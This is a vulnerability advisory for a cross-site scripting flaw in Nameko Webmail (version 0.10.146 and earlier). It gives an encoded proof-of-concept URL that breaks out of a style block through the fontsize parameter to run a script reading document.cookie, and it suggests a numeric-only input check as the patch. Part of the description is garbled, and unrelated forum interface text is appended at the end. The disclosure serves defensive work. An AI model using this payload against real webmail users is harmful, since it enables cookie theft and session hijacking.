* Nameko Webmail XSS Vulnerability on version <= 0.10.146
* ========================================================
*
* Homepage: http://www.wizshelf.org/nameko/
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================
Introduction:
-------------
Nameko is a set of tools for working with e-mails in PHP.
The core of Nameko is composed by a set of classes for
retrieve mail from a POP3 server, and parsing them to
get the body (both in plain text and HTML, if included)
and the attachments. Is included the NamekoWebmail,
that is a powerful webmail.
Description:
------------
The XSS vulnerability is located on the credits page, where
is possible to change the font size by an http get request
(ex. fontsize=11). The "fontsize" variable write his content
inside a
any javascript inside a tag
The URL for match the XSS, should be like (url-decoded):
?fontsize=11pt;+}+
XSS URL:
--------
http[s]://** victim host **/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66
or
http[s]://** victim host **/?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66
Patch:
------
Is possible to patch this by make a check on the $_GET['FONTSIZE'] var,
making sure that it is numeric only.
// On file nameko.php (line 93):
if($_GET[fontsize]) $_SESSION[FONTSIZE]=$_GET[fontsize];
// should be replaced with something like that:
if(preg_match('/^[0-9]{2,2}$/', $_GET[fontsize])) {
$_SESSION[FONTSIZE]=$_GET[fontsize];
} else {
$_SESSION[FONTSIZE]=11;
}
CREDITS:
---------
This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
